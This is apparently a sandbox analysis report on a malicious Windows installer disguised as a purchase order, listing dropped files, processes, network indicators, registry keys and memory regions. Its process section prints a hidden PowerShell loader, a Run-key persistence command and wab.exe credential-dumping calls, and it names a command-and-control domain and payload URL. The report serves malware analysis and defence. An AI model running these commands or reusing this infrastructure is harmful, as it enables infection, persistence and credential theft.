Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
z14Novospedidosdecompra_Profil_4903.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Roaming\mqerms.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Extracollegiate\Chiffonnierer\Rudekonvolutten\z14Novospedidosdecompra_Profil_4903.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Kursusplans.Fje
|
ASCII text, with very long lines (61111), with no line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eiylbra4.1bj.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_psk4hbo2.z4a.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bhv6644.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0x6eec0579, page size 32768, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\wjdznalymjqnxoyrjyc
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Batteriforsynede\Trolddomsvirksomhederne\Laboredness.Fid
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Extracollegiate\Chiffonnierer\Rudekonvolutten\bouillonterningens.skk
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Extracollegiate\Chiffonnierer\Rudekonvolutten\nondeferential.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Extracollegiate\Chiffonnierer\Rudekonvolutten\z14Novospedidosdecompra_Profil_4903.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Hustle118\Foundering\Ljtnanterne\Unstraightness\Holomorph196.mil
|
BS image, Version -29696, Quantization -30208, (Decompresses to 153 words)
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Hustle118\Foundering\Ljtnanterne\Unstraightness\Slumretppe.hor
|
data
|
dropped
|
There are 6 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe
|
"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell.exe" -windowstyle hidden "$Bromslvs=Get-Content 'C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Kursusplans.Fje';$Oxyphosphate=$Bromslvs.SubString(61080,3);.$Oxyphosphate($Bromslvs)"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ
/d "%Slettelsers% -windowstyle minimized $ronnels=(Get-ItemProperty -Path 'HKCU:\Forsorgspdagog\').Skeletoverstter;%Slettelsers%
($ronnels)"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wjdznalymjqnxoyrjyc"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wjdznalymjqnxoyrjyc"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hdqrgswaarisauuvaipksos"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jfwcglgtwzafkaizktcddtnovi"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Slettelsers% -windowstyle
minimized $ronnels=(Get-ItemProperty -Path 'HKCU:\Forsorgspdagog\').Skeletoverstter;%Slettelsers% ($ronnels)"
|
There are 2 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
learfo55ozj01.duckdns.org
|
|
||
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
|
|
|
http://geoplugin.net/json.gpd
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.imvu.comr
|
unknown
|
||
|
http://geoplugin.net/json.gpg
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
http://geoplugin.net/json.gpi
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://www.imvu.com
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://geoplugin.net/json.gpr
|
unknown
|
||
|
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
|
http://geoplugin.net/json.gp09
|
unknown
|
||
|
https://ricohltd.top/PIoDroeALMbPB243.binn
|
unknown
|
||
|
http://geoplugin.net/json.gpz
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
|
unknown
|
||
|
https://ricohltd.top/
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
http://geoplugin.net/
|
unknown
|
||
|
http://geoplugin.net/json.gpE
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://www.google.com/accounts/servicelogin
|
unknown
|
||
|
https://login.yahoo.com/config/login
|
unknown
|
||
|
https://ricohltd.top/PIoDroeALMbPB243.binB
|
unknown
|
||
|
http://www.nirsoft.net/
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://ricohltd.top/PIoDroeALMbPB243.bin
|
104.21.60.38
|
||
|
http://www.ebuddy.com
|
unknown
|
There are 23 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
learfo55ozj01.duckdns.org
|
193.222.96.21
|
|
|
|
geoplugin.net
|
178.237.33.50
|
||
|
ricohltd.top
|
104.21.60.38
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
193.222.96.21
|
learfo55ozj01.duckdns.org
|
Germany
|
|
|
|
104.21.60.38
|
ricohltd.top
|
United States
|
||
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Shield79\Uninstall\mechanalize\Frederikke66
|
corticosteroid
|
||
|
HKEY_CURRENT_USER\SOFTWARE\valgresultatet\hellige
|
tilbagefrslen
|
||
|
HKEY_CURRENT_USER\Forsorgspdagog
|
Skeletoverstter
|
||
|
HKEY_CURRENT_USER\Environment
|
Slettelsers
|
||
|
HKEY_CURRENT_USER\SOFTWARE\alpwovnb-G3F5OR
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\alpwovnb-G3F5OR
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\alpwovnb-G3F5OR
|
time
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Startup key
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
9F4C000
|
direct allocation
|
page execute and read and write
|
|
|
|
971E000
|
heap
|
page read and write
|
|
|
|
971E000
|
heap
|
page read and write
|
|
|
|
971F000
|
heap
|
page read and write
|
|
|
|
971A000
|
heap
|
page read and write
|
|
|
|
46E1000
|
heap
|
page read and write
|
||
|
480000
|
heap
|
page read and write
|
||
|
2290000
|
heap
|
page read and write
|
||
|
6089000
|
trusted library allocation
|
page read and write
|
||
|
72F0000
|
direct allocation
|
page read and write
|
||
|
96F8000
|
heap
|
page read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
2FE0000
|
heap
|
page read and write
|
||
|
975000
|
heap
|
page read and write
|
||
|
256B1000
|
heap
|
page read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
46F5000
|
heap
|
page read and write
|
||
|
256B0000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
2240000
|
heap
|
page read and write
|
||
|
431000
|
unkown
|
page read and write
|
||
|
8AA8000
|
heap
|
page read and write
|
||
|
30B4000
|
heap
|
page read and write
|
||
|
4709000
|
heap
|
page read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
3280000
|
heap
|
page read and write
|
||
|
7B80000
|
trusted library allocation
|
page read and write
|
||
|
25210000
|
remote allocation
|
page read and write
|
||
|
2295000
|
heap
|
page read and write
|
||
|
2583A000
|
heap
|
page read and write
|
||
|
7BC000
|
stack
|
page read and write
|
||
|
4B3E000
|
stack
|
page read and write
|
||
|
470D000
|
heap
|
page read and write
|
||
|
32A0000
|
heap
|
page read and write
|
||
|
30B4000
|
heap
|
page read and write
|
||
|
975000
|
heap
|
page read and write
|
||
|
975000
|
heap
|
page read and write
|
||
|
25A69000
|
heap
|
page read and write
|
||
|
975000
|
heap
|
page read and write
|
||
|
259C1000
|
heap
|
page read and write
|
||
|
4709000
|
heap
|
page read and write
|
||
|
2F19000
|
heap
|
page read and write
|
||
|
259C1000
|
heap
|
page read and write
|
||
|
24F8E000
|
stack
|
page read and write
|
||
|
26AD000
|
stack
|
page read and write
|
||
|
25610000
|
direct allocation
|
page read and write
|
||
|
339F000
|
stack
|
page read and write
|
||
|
70DE000
|
stack
|
page read and write
|
||
|
2DB6000
|
heap
|
page read and write
|
||
|
252EC000
|
stack
|
page read and write
|
||
|
2CE0000
|
heap
|
page read and write
|
||
|
46E0000
|
heap
|
page read and write
|
||
|
4714000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
7A5E000
|
stack
|
page read and write
|
||
|
4BD0000
|
heap
|
page read and write
|
||
|
5161000
|
heap
|
page read and write
|
||
|
2EBC000
|
heap
|
page read and write
|
||
|
5DE000
|
stack
|
page read and write
|
||
|
219E000
|
stack
|
page read and write
|
||
|
7BA0000
|
trusted library allocation
|
page read and write
|
||
|
46E8000
|
heap
|
page read and write
|
||
|
46FD000
|
heap
|
page read and write
|
||
|
477A000
|
heap
|
page read and write
|
||
|
5CFC000
|
remote allocation
|
page execute and read and write
|
||
|
46F8000
|
heap
|
page read and write
|
||
|
30B4000
|
heap
|
page read and write
|
||
|
7C9000
|
heap
|
page read and write
|
||
|
30B4000
|
heap
|
page read and write
|
||
|
7B50000
|
trusted library allocation
|
page read and write
|
||
|
2870000
|
heap
|
page read and write
|
||
|
250EE000
|
stack
|
page read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
7B90000
|
trusted library allocation
|
page read and write
|
||
|
30B4000
|
heap
|
page read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
977B000
|
heap
|
page read and write
|
||
|
4B80000
|
heap
|
page readonly
|
||
|
9718000
|
heap
|
page read and write
|
||
|
8730000
|
trusted library allocation
|
page read and write
|
||
|
B34C000
|
direct allocation
|
page execute and read and write
|
||
|
46E1000
|
heap
|
page read and write
|
||
|
31F8000
|
heap
|
page read and write
|
||
|
7864000
|
heap
|
page read and write
|
||
|
46F1000
|
heap
|
page read and write
|
||
|
3250000
|
heap
|
page read and write
|
||
|
2EDF000
|
stack
|
page read and write
|
||
|
2EA0000
|
heap
|
page read and write
|
||
|
239F000
|
stack
|
page read and write
|
||
|
977B000
|
heap
|
page read and write
|
||
|
7948000
|
heap
|
page read and write
|
||
|
7BC0000
|
trusted library allocation
|
page read and write
|
||
|
4AF9000
|
trusted library allocation
|
page read and write
|
||
|
2F10000
|
heap
|
page read and write
|
||
|
857000
|
stack
|
page read and write
|
||
|
46F1000
|
heap
|
page read and write
|
||
|
2BC4000
|
heap
|
page read and write
|
||
|
30B0000
|
heap
|
page read and write
|
||
|
9781000
|
heap
|
page read and write
|
||
|
765E000
|
stack
|
page read and write
|
||
|
25A52000
|
heap
|
page read and write
|
||
|
477A000
|
heap
|
page read and write
|
||
|
97F000
|
stack
|
page read and write
|
||
|
4AF0000
|
trusted library allocation
|
page read and write
|
||
|
470D000
|
heap
|
page read and write
|
||
|
25729000
|
heap
|
page read and write
|
||
|
2A10000
|
heap
|
page read and write
|
||
|
477A000
|
heap
|
page read and write
|
||
|
25DC0000
|
unclassified section
|
page execute and read and write
|
||
|
2542E000
|
stack
|
page read and write
|
||
|
7290000
|
direct allocation
|
page read and write
|
||
|
620F000
|
trusted library allocation
|
page read and write
|
||
|
4BC0000
|
heap
|
page read and write
|
||
|
2BD0000
|
heap
|
page readonly
|
||
|
333E000
|
stack
|
page read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
71C0000
|
heap
|
page execute and read and write
|
||
|
471C000
|
heap
|
page read and write
|
||
|
8C60000
|
trusted library allocation
|
page execute and read and write
|
||
|
248A0000
|
direct allocation
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
401000
|
unkown
|
page execute read
|
||
|
24DBD000
|
stack
|
page read and write
|
||
|
25080000
|
direct allocation
|
page read and write
|
||
|
384F000
|
stack
|
page read and write
|
||
|
25A51000
|
heap
|
page read and write
|
||
|
4F1E000
|
stack
|
page read and write
|
||
|
4F10000
|
trusted library allocation
|
page read and write
|
||
|
255FB000
|
unclassified section
|
page execute and read and write
|
||
|
35A0000
|
heap
|
page read and write
|
||
|
7260000
|
direct allocation
|
page read and write
|
||
|
4F10000
|
trusted library allocation
|
page read and write
|
||
|
31AD000
|
heap
|
page read and write
|
||
|
8C80000
|
direct allocation
|
page execute and read and write
|
||
|
4B7E000
|
stack
|
page read and write
|
||
|
46EC000
|
heap
|
page read and write
|
||
|
4714000
|
heap
|
page read and write
|
||
|
4ECF000
|
stack
|
page read and write
|
||
|
248E0000
|
direct allocation
|
page read and write
|
||
|
46F3000
|
heap
|
page read and write
|
||
|
46E1000
|
heap
|
page read and write
|
||
|
355B000
|
heap
|
page read and write
|
||
|
30B4000
|
heap
|
page read and write
|
||
|
7910000
|
heap
|
page read and write
|
||
|
32F0000
|
heap
|
page read and write
|
||
|
66FC000
|
remote allocation
|
page execute and read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
46F6000
|
heap
|
page read and write
|
||
|
780000
|
heap
|
page read and write
|
||
|
470E000
|
heap
|
page read and write
|
||
|
24D30000
|
heap
|
page read and write
|
||
|
873000
|
stack
|
page read and write
|
||
|
7840000
|
trusted library allocation
|
page read and write
|
||
|
711F000
|
stack
|
page read and write
|
||
|
3050000
|
heap
|
page readonly
|
||
|
2EA0000
|
heap
|
page read and write
|
||
|
A60000
|
heap
|
page read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
3400000
|
heap
|
page read and write
|
||
|
9660000
|
heap
|
page read and write
|
||
|
5161000
|
heap
|
page read and write
|
||
|
25A48000
|
heap
|
page read and write
|
||
|
30B4000
|
heap
|
page read and write
|
||
|
2BA0000
|
heap
|
page read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
971C000
|
heap
|
page read and write
|
||
|
2F1D000
|
heap
|
page read and write
|
||
|
25E96000
|
unclassified section
|
page execute and read and write
|
||
|
8ABB000
|
heap
|
page read and write
|
||
|
3286000
|
heap
|
page read and write
|
||
|
9766000
|
heap
|
page read and write
|
||
|
329F000
|
heap
|
page read and write
|
||
|
2532C000
|
stack
|
page read and write
|
||
|
46E9000
|
heap
|
page read and write
|
||
|
4701000
|
heap
|
page read and write
|
||
|
9980000
|
direct allocation
|
page read and write
|
||
|
4B02000
|
heap
|
page read and write
|
||
|
46E9000
|
heap
|
page read and write
|
||
|
7250000
|
direct allocation
|
page read and write
|
||
|
869D000
|
trusted library allocation
|
page read and write
|
||
|
99A0000
|
direct allocation
|
page read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
477A000
|
heap
|
page read and write
|
||
|
3550000
|
heap
|
page read and write
|
||
|
46F5000
|
heap
|
page read and write
|
||
|
4B0A000
|
trusted library allocation
|
page execute and read and write
|
||
|
435000
|
unkown
|
page read and write
|
||
|
258B2000
|
heap
|
page read and write
|
||
|
24FCF000
|
stack
|
page read and write
|
||
|
2A60000
|
heap
|
page read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
4705000
|
heap
|
page read and write
|
||
|
221E000
|
stack
|
page read and write
|
||
|
24D1D000
|
stack
|
page read and write
|
||
|
305D000
|
stack
|
page read and write
|
||
|
4D28000
|
heap
|
page read and write
|
||
|
975000
|
heap
|
page read and write
|
||
|
374F000
|
unkown
|
page read and write
|
||
|
4718000
|
heap
|
page read and write
|
||
|
4701000
|
heap
|
page read and write
|
||
|
257C1000
|
heap
|
page read and write
|
||
|
46FE000
|
heap
|
page read and write
|
||
|
2C1E000
|
stack
|
page read and write
|
||
|
2B7E000
|
stack
|
page read and write
|
||
|
25090000
|
direct allocation
|
page read and write
|
||
|
470A000
|
heap
|
page read and write
|
||
|
2F1A000
|
heap
|
page read and write
|
||
|
7B10000
|
trusted library allocation
|
page read and write
|
||
|
2420000
|
heap
|
page read and write
|
||
|
30B4000
|
heap
|
page read and write
|
||
|
25E9C000
|
unclassified section
|
page execute and read and write
|
||
|
477A000
|
heap
|
page read and write
|
||
|
2D9C000
|
stack
|
page read and write
|
||
|
8714000
|
trusted library allocation
|
page read and write
|
||
|
24CA0000
|
heap
|
page read and write
|
||
|
975000
|
heap
|
page read and write
|
||
|
2556C000
|
stack
|
page read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
52FC000
|
remote allocation
|
page execute and read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
2DD9000
|
stack
|
page read and write
|
||
|
974C000
|
heap
|
page read and write
|
||
|
8740000
|
heap
|
page read and write
|
||
|
72D0000
|
direct allocation
|
page read and write
|
||
|
6209000
|
trusted library allocation
|
page read and write
|
||
|
259C0000
|
heap
|
page read and write
|
||
|
2A70000
|
heap
|
page read and write
|
||
|
970000
|
heap
|
page read and write
|
||
|
248D0000
|
direct allocation
|
page read and write
|
||
|
503E000
|
stack
|
page read and write
|
||
|
459000
|
system
|
page execute and read and write
|
||
|
30B4000
|
heap
|
page read and write
|
||
|
4B00000
|
trusted library allocation
|
page read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
977B000
|
heap
|
page read and write
|
||
|
89A0000
|
trusted library allocation
|
page read and write
|
||
|
5061000
|
trusted library allocation
|
page read and write
|
||
|
30B4000
|
heap
|
page read and write
|
||
|
8C70000
|
heap
|
page read and write
|
||
|
50BF000
|
trusted library allocation
|
page read and write
|
||
|
258B2000
|
heap
|
page read and write
|
||
|
9990000
|
direct allocation
|
page read and write
|
||
|
46F0000
|
heap
|
page read and write
|
||
|
31F0000
|
heap
|
page read and write
|
||
|
3850000
|
heap
|
page read and write
|
||
|
2EC0000
|
heap
|
page read and write
|
||
|
471C000
|
heap
|
page read and write
|
||
|
25729000
|
heap
|
page read and write
|
||
|
8C40000
|
trusted library allocation
|
page read and write
|
||
|
5050000
|
heap
|
page read and write
|
||
|
83C000
|
stack
|
page read and write
|
||
|
74A0000
|
heap
|
page read and write
|
||
|
473E000
|
heap
|
page read and write
|
||
|
470E000
|
heap
|
page read and write
|
||
|
46E1000
|
heap
|
page read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
34FE000
|
stack
|
page read and write
|
||
|
99C0000
|
heap
|
page read and write
|
||
|
7AFC000
|
remote allocation
|
page execute and read and write
|
||
|
454000
|
unkown
|
page readonly
|
||
|
4701000
|
heap
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
251BD000
|
stack
|
page read and write
|
||
|
85D0000
|
trusted library allocation
|
page read and write
|
||
|
2BC1000
|
heap
|
page read and write
|
||
|
7742000
|
heap
|
page read and write
|
||
|
7F070000
|
trusted library allocation
|
page execute and read and write
|
||
|
30B4000
|
heap
|
page read and write
|
||
|
7868000
|
heap
|
page read and write
|
||
|
86F000
|
stack
|
page read and write
|
||
|
975000
|
heap
|
page read and write
|
||
|
46F2000
|
heap
|
page read and write
|
||
|
788000
|
heap
|
page read and write
|
||
|
3DA0000
|
remote allocation
|
page execute and read and write
|
||
|
9780000
|
heap
|
page read and write
|
||
|
2517D000
|
stack
|
page read and write
|
||
|
975000
|
heap
|
page read and write
|
||
|
2583A000
|
heap
|
page read and write
|
||
|
4701000
|
heap
|
page read and write
|
||
|
9776000
|
heap
|
page read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
2B40000
|
trusted library allocation
|
page read and write
|
||
|
2572A000
|
heap
|
page read and write
|
||
|
2F1B000
|
heap
|
page read and write
|
||
|
46E9000
|
heap
|
page read and write
|
||
|
4F40000
|
trusted library allocation
|
page execute and read and write
|
||
|
3279000
|
heap
|
page read and write
|
||
|
2D0C000
|
stack
|
page read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
4AED000
|
trusted library allocation
|
page execute and read and write
|
||
|
C74C000
|
direct allocation
|
page execute and read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
8A40000
|
heap
|
page read and write
|
||
|
863D000
|
stack
|
page read and write
|
||
|
4FEE000
|
stack
|
page read and write
|
||
|
3870000
|
heap
|
page read and write
|
||
|
253EB000
|
stack
|
page read and write
|
||
|
974C000
|
heap
|
page read and write
|
||
|
2250000
|
heap
|
page read and write
|
||
|
70FC000
|
remote allocation
|
page execute and read and write
|
||
|
25A69000
|
heap
|
page read and write
|
||
|
6061000
|
trusted library allocation
|
page read and write
|
||
|
2D9E000
|
unkown
|
page read and write
|
||
|
96BC000
|
heap
|
page read and write
|
||
|
4B7E000
|
stack
|
page read and write
|
||
|
72B0000
|
direct allocation
|
page read and write
|
||
|
E54C000
|
direct allocation
|
page execute and read and write
|
||
|
9728000
|
heap
|
page read and write
|
||
|
41B000
|
system
|
page execute and read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
977B000
|
heap
|
page read and write
|
||
|
88CC000
|
stack
|
page read and write
|
||
|
30B4000
|
heap
|
page read and write
|
||
|
254AE000
|
stack
|
page read and write
|
||
|
30B0000
|
heap
|
page read and write
|
||
|
2EA8000
|
heap
|
page read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
43F000
|
unkown
|
page read and write
|
||
|
7220000
|
direct allocation
|
page read and write
|
||
|
25A49000
|
heap
|
page read and write
|
||
|
954C000
|
direct allocation
|
page execute and read and write
|
||
|
867E000
|
stack
|
page read and write
|
||
|
7A9E000
|
stack
|
page read and write
|
||
|
46F0000
|
heap
|
page read and write
|
||
|
253AF000
|
stack
|
page read and write
|
||
|
2D9F000
|
stack
|
page read and write
|
||
|
2512F000
|
stack
|
page read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
2552E000
|
stack
|
page read and write
|
||
|
46F3000
|
heap
|
page read and write
|
||
|
46E4000
|
heap
|
page read and write
|
||
|
470D000
|
heap
|
page read and write
|
||
|
4B10000
|
trusted library allocation
|
page read and write
|
||
|
98000
|
stack
|
page read and write
|
||
|
309D000
|
stack
|
page read and write
|
||
|
30B4000
|
heap
|
page read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
975000
|
heap
|
page read and write
|
||
|
30BC000
|
heap
|
page read and write
|
||
|
975000
|
heap
|
page read and write
|
||
|
59E000
|
stack
|
page read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
5059000
|
heap
|
page read and write
|
||
|
9776000
|
heap
|
page read and write
|
||
|
248B0000
|
direct allocation
|
page read and write
|
||
|
24910000
|
direct allocation
|
page read and write
|
||
|
79C0000
|
trusted library allocation
|
page read and write
|
||
|
470D000
|
heap
|
page read and write
|
||
|
BD4C000
|
direct allocation
|
page execute and read and write
|
||
|
93E000
|
stack
|
page read and write
|
||
|
46F3000
|
heap
|
page read and write
|
||
|
25210000
|
remote allocation
|
page read and write
|
||
|
46E0000
|
heap
|
page read and write
|
||
|
470D000
|
heap
|
page read and write
|
||
|
25070000
|
direct allocation
|
page read and write
|
||
|
46F0000
|
heap
|
page read and write
|
||
|
46E1000
|
heap
|
page read and write
|
||
|
2D47000
|
stack
|
page read and write
|
||
|
78C2000
|
heap
|
page read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
46EE000
|
heap
|
page read and write
|
||
|
86E5000
|
trusted library allocation
|
page read and write
|
||
|
715E000
|
stack
|
page read and write
|
||
|
974C000
|
heap
|
page read and write
|
||
|
470C000
|
heap
|
page read and write
|
||
|
2BC2000
|
heap
|
page read and write
|
||
|
46E8000
|
heap
|
page read and write
|
||
|
8680000
|
heap
|
page read and write
|
||
|
31A0000
|
heap
|
page read and write
|
||
|
4701000
|
heap
|
page read and write
|
||
|
30B4000
|
heap
|
page read and write
|
||
|
86A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7BA000
|
heap
|
page read and write
|
||
|
3320000
|
heap
|
page read and write
|
||
|
46F0000
|
heap
|
page read and write
|
||
|
24920000
|
direct allocation
|
page read and write
|
||
|
34AE000
|
unkown
|
page read and write
|
||
|
25E33000
|
unclassified section
|
page execute and read and write
|
||
|
60CA000
|
trusted library allocation
|
page read and write
|
||
|
470E000
|
heap
|
page read and write
|
||
|
46F0000
|
heap
|
page read and write
|
||
|
85B0000
|
heap
|
page read and write
|
||
|
46E1000
|
heap
|
page read and write
|
||
|
24930000
|
direct allocation
|
page read and write
|
||
|
2DB0000
|
heap
|
page read and write
|
||
|
473E000
|
heap
|
page read and write
|
||
|
A3D000
|
stack
|
page read and write
|
||
|
25210000
|
heap
|
page read and write
|
||
|
975000
|
heap
|
page read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
9766000
|
heap
|
page read and write
|
||
|
34B0000
|
heap
|
page read and write
|
||
|
8760000
|
trusted library allocation
|
page read and write
|
||
|
4701000
|
heap
|
page read and write
|
||
|
974C000
|
heap
|
page read and write
|
||
|
7980000
|
trusted library allocation
|
page read and write
|
||
|
3100000
|
heap
|
page read and write
|
||
|
8720000
|
trusted library allocation
|
page read and write
|
||
|
99B0000
|
direct allocation
|
page read and write
|
||
|
8A5F000
|
heap
|
page read and write
|
||
|
4DCF000
|
stack
|
page read and write
|
||
|
7B70000
|
trusted library allocation
|
page read and write
|
||
|
25ACA000
|
heap
|
page read and write
|
||
|
46F5000
|
heap
|
page read and write
|
||
|
4701000
|
heap
|
page read and write
|
||
|
7847000
|
trusted library allocation
|
page read and write
|
||
|
2525E000
|
stack
|
page read and write
|
||
|
2DEF000
|
stack
|
page read and write
|
||
|
255E0000
|
unclassified section
|
page execute and read and write
|
||
|
46FE000
|
heap
|
page read and write
|
||
|
46FB000
|
heap
|
page read and write
|
||
|
2E9F000
|
stack
|
page read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
3408000
|
heap
|
page read and write
|
||
|
A45000
|
heap
|
page read and write
|
||
|
24940000
|
direct allocation
|
page read and write
|
||
|
974C000
|
heap
|
page read and write
|
||
|
46F0000
|
heap
|
page read and write
|
||
|
46E1000
|
heap
|
page read and write
|
||
|
8EFC000
|
remote allocation
|
page execute and read and write
|
||
|
2254000
|
heap
|
page read and write
|
||
|
2546C000
|
stack
|
page read and write
|
||
|
9670000
|
heap
|
page read and write
|
||
|
475C000
|
heap
|
page read and write
|
||
|
25E1D000
|
unclassified section
|
page execute and read and write
|
||
|
3328000
|
heap
|
page read and write
|
||
|
5E0000
|
heap
|
page read and write
|
||
|
2B8E000
|
stack
|
page read and write
|
||
|
7B6000
|
heap
|
page read and write
|
||
|
3040000
|
heap
|
page read and write
|
||
|
3310000
|
trusted library section
|
page read and write
|
||
|
24D7C000
|
stack
|
page read and write
|
||
|
788E000
|
heap
|
page read and write
|
||
|
475C000
|
heap
|
page read and write
|
||
|
2BB5000
|
heap
|
page read and write
|
||
|
3EFC000
|
remote allocation
|
page execute and read and write
|
||
|
250A0000
|
direct allocation
|
page read and write
|
||
|
2BA8000
|
heap
|
page read and write
|
||
|
79D0000
|
trusted library allocation
|
page read and write
|
||
|
9725000
|
heap
|
page read and write
|
||
|
4D1F000
|
stack
|
page read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
974000
|
